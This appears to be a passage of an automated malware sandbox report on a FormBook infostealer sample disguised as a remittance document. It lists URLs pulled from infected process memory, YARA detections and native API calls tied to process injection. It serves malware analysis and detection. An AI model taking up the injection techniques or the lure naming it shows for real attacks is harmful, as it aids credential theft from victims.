            Source: winver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/19/19m/19mvcd.css?ph=8290e35a9b
            Source: winver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/2i/2iw/2iwzy5.css?ph=8290e35a9b
            Source: winver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/2r/2rd/2rdzz2.css?ph=8290e35a9b
            Source: winver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/2v/2v4/2v414g.css?ph=8290e35a9b
            Source: winver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/32/32i/32i65q.css?ph=8290e35a9b
            Source: winver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/39/396/39634o.js?ph=8290e35a9b
            Source: winver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/3c/3cw/3cwfrk.css?ph=8290e35a9b
            Source: winver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/3f/3f9/3f9vvf.css?ph=8290e35a9b
            Source: winver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/49/49x/49xmuk.css?ph=8290e35a9b
            Source: winver.exe, 00000011.00000003.2517734762.00000000080D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: winver.exe, 00000011.00000003.2517734762.00000000080D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: winver.exe, 00000011.00000003.2517734762.00000000080D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: winver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://events.webnode.com/projects/-/events/
            Source: winver.exe, 00000011.00000002.4495925403.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Medium.woff)
            Source: winver.exe, 00000011.00000002.4495925403.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Medium.woff2)
            Source: winver.exe, 00000011.00000002.4495925403.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Regular.woff)
            Source: winver.exe, 00000011.00000002.4495925403.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Regular.woff2)
            Source: winver.exe, 00000011.00000002.4495925403.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-SemiBold.woff)
            Source: winver.exe, 00000011.00000002.4495925403.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-SemiBold.woff2)
            Source: winver.exe, 00000011.00000002.4495925403.0000000005BE8000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003BF8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
            Source: winver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com
            Source: winver.exe, 00000011.00000002.4497860511.0000000007D40000.00000004.00000800.00020000.00000000.sdmp, winver.exe, 00000011.00000002.4495925403.0000000005BE8000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003BF8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.hover.com/home?source=expired
            Source: winver.exe, 00000011.00000002.4494261459.00000000032C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: winver.exe, 00000011.00000002.4494261459.00000000032C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: winver.exe, 00000011.00000002.4494261459.00000000032C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: winver.exe, 00000011.00000002.4494261459.00000000032C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033S
            Source: winver.exe, 00000011.00000002.4494261459.00000000032C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: winver.exe, 00000011.00000002.4494261459.00000000032C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: winver.exe, 00000011.00000003.2514223684.000000000800E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: winver.exe, 00000011.00000002.4495925403.0000000006878000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000004888000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://newmediamonday.com
            Source: winver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ogp.me/ns#
            Source: winver.exe, 00000011.00000002.4495925403.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru?target=_blank
            Source: vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://server27.hosting.reg.ru/manager
            Source: winver.exe, 00000011.00000002.4497860511.0000000007D40000.00000004.00000800.00020000.00000000.sdmp, winver.exe, 00000011.00000002.4495925403.0000000005BE8000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003BF8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://twitter.com/hover
            Source: winver.exe, 00000011.00000003.2517734762.00000000080D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: winver.exe, 00000011.00000002.4495925403.00000000058C4000.00000004.10000000.00040000.00000000.sdmp, winver.exe, 00000011.00000002.4495925403.00000000066E6000.00000004.10000000.00040000.00000000.sdmp, winver.exe, 00000011.00000002.4495925403.0000000006554000.00000004.10000000.00040000.00000000.sdmp, winver.exe, 00000011.00000002.4497860511.0000000007D40000.00000004.00000800.00020000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000046F6000.00000004.00000001.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000004564000.00000004.00000001.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000038D4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2622894066.000000000CE64000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: winver.exe, 00000011.00000003.2517734762.00000000080D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: winver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-542MMSL
            Source: vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003BF8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/?source=expired
            Source: winver.exe, 00000011.00000002.4497860511.0000000007D40000.00000004.00000800.00020000.00000000.sdmp, winver.exe, 00000011.00000002.4495925403.0000000005BE8000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003BF8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/about?source=expired
            Source: winver.exe, 00000011.00000002.4497860511.0000000007D40000.00000004.00000800.00020000.00000000.sdmp, winver.exe, 00000011.00000002.4495925403.0000000005BE8000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003BF8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/domain_pricing?source=expired
            Source: winver.exe, 00000011.00000002.4495925403.0000000005BE8000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003BF8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/domains/results
            Source: winver.exe, 00000011.00000002.4497860511.0000000007D40000.00000004.00000800.00020000.00000000.sdmp, winver.exe, 00000011.00000002.4495925403.0000000005BE8000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003BF8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/email?source=expired
            Source: winver.exe, 00000011.00000002.4497860511.0000000007D40000.00000004.00000800.00020000.00000000.sdmp, winver.exe, 00000011.00000002.4495925403.0000000005BE8000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003BF8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/privacy?source=expired
            Source: winver.exe, 00000011.00000002.4495925403.0000000005BE8000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003BF8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/renew/domain/botcsllc.com?source=expired
            Source: winver.exe, 00000011.00000002.4497860511.0000000007D40000.00000004.00000800.00020000.00000000.sdmp, winver.exe, 00000011.00000002.4495925403.0000000005BE8000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003BF8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/renew?source=expired
            Source: winver.exe, 00000011.00000002.4497860511.0000000007D40000.00000004.00000800.00020000.00000000.sdmp, winver.exe, 00000011.00000002.4495925403.0000000005BE8000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003BF8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/tools?source=expired
            Source: winver.exe, 00000011.00000002.4497860511.0000000007D40000.00000004.00000800.00020000.00000000.sdmp, winver.exe, 00000011.00000002.4495925403.0000000005BE8000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003BF8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/tos?source=expired
            Source: winver.exe, 00000011.00000002.4497860511.0000000007D40000.00000004.00000800.00020000.00000000.sdmp, winver.exe, 00000011.00000002.4495925403.0000000005BE8000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003BF8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/transfer_in?source=expired
            Source: winver.exe, 00000011.00000002.4497860511.0000000007D40000.00000004.00000800.00020000.00000000.sdmp, winver.exe, 00000011.00000002.4495925403.0000000005BE8000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003BF8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.instagram.com/hover_domains
            Source: vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.lesfleursdeceline.be/page-not-found-404/
            Source: winver.exe, 00000011.00000002.4495925403.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=&utm_medium=expired&utm_campaign
            Source: winver.exe, 00000011.00000002.4495925403.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=&utm_medium=expired&utm_campaign
            Source: winver.exe, 00000011.00000002.4495925403.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/ssl-certificate/?utm_source=&utm_medium=expired&utm_campaign
            Source: winver.exe, 00000011.00000002.4495925403.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/support/#request
            Source: winver.exe, 00000011.00000002.4495925403.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/support/hosting-i-servery/moy-sayt-ne-rabotaet/oshibka-404
            Source: winver.exe, 00000011.00000002.4495925403.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/vps/?utm_source=&utm_medium=expired&utm_campaign
            Source: winver.exe, 00000011.00000002.4495925403.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/vps/cloud/?utm_source=&utm_medium=expired&utm_campaign
            Source: winver.exe, 00000011.00000002.4495925403.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-tools/geoip?utm_source=&utm_medium=expired&utm_campaign
            Source: winver.exe, 00000011.00000002.4495925403.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-tools/myip?utm_source=&utm_medium=expired&utm_campaign
            Source: winver.exe, 00000011.00000002.4495925403.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-tools/port-checker?utm_source=&utm_medium=expired&utm_campaign
            Source: winver.exe, 00000011.00000002.4495925403.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?utm_source=&utm_medium=expired&utm_campaign
            Source: winver.exe, 00000011.00000002.4495925403.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/check_site?utm_source=&utm_medium=expired&utm_campaign

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 9.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.2334768976.0000000001AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2332025821.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4495210628.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.4497473931.0000000005920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4495268104.0000000004C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4493681409.0000000002D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2334955851.0000000001C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.4495209551.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 9.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 9.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.2334768976.0000000001AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.2332025821.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000011.00000002.4495210628.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000012.00000002.4497473931.0000000005920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000011.00000002.4495268104.0000000004C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000011.00000002.4493681409.0000000002D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.2334955851.0000000001C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000010.00000002.4495209551.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            .NET source code contains very large array initializations
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.6ab0000.6.raw.unpack, .csLarge array initialization: : array initializer size 27103
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.2854940.0.raw.unpack, .csLarge array initialization: : array initializer size 27103
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0042B0A3 NtClose,9_2_0042B0A3
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D2B60 NtClose,LdrInitializeThunk,9_2_017D2B60
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D2DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_017D2DF0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D2C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_017D2C70
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D35C0 NtCreateMutant,LdrInitializeThunk,9_2_017D35C0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D4340 NtSetContextThread,9_2_017D4340
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D4650 NtSuspendThread,9_2_017D4650
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D2BF0 NtAllocateVirtualMemory,9_2_017D2BF0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D2BE0 NtQueryValueKey,9_2_017D2BE0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D2BA0 NtEnumerateValueKey,9_2_017D2BA0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D2B80 NtQueryInformationFile,9_2_017D2B80
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D2AF0 NtWriteFile,9_2_017D2AF0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D2AD0 NtReadFile,9_2_017D2AD0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D2AB0 NtWaitForSingleObject,9_2_017D2AB0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D2D30 NtUnmapViewOfSection,9_2_017D2D30
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D2D10 NtMapViewOfSection,9_2_017D2D10
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D2D00 NtSetInformationFile,9_2_017D2D00
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D2DD0 NtDelayExecution,9_2_017D2DD0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D2DB0 NtEnumerateKey,9_2_017D2DB0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D2C60 NtCreateKey,9_2_017D2C60
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D2C00 NtQueryInformationProcess,9_2_017D2C00
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D2CF0 NtOpenProcess,9_2_017D2CF0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D2CC0 NtQueryVirtualMemory,9_2_017D2CC0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D2CA0 NtQueryInformationToken,9_2_017D2CA0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D2F60 NtCreateProcessEx,9_2_017D2F60
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D2F30 NtCreateSection,9_2_017D2F30
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D2FE0 NtCreateFile,9_2_017D2FE0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D2FB0 NtResumeThread,9_2_017D2FB0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D2FA0 NtQuerySection,9_2_017D2FA0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D2F90 NtProtectVirtualMemory,9_2_017D2F90
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D2E30 NtWriteVirtualMemory,9_2_017D2E30
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D2EE0 NtQueueApcThread,9_2_017D2EE0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D2EA0 NtAdjustPrivilegesToken,9_2_017D2EA0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D2E80 NtReadVirtualMemory,9_2_017D2E80
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D3010 NtOpenDirectoryObject,9_2_017D3010
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D3090 NtSetValueKey,9_2_017D3090
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D39B0 NtGetContextThread,9_2_017D39B0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D3D70 NtOpenThread,9_2_017D3D70
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D3D10 NtOpenProcessToken,9_2_017D3D10
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 0_2_00E3D5BC0_2_00E3D5BC
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 0_2_06BE44A80_2_06BE44A8
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 0_2_06BE25280_2_06BE2528
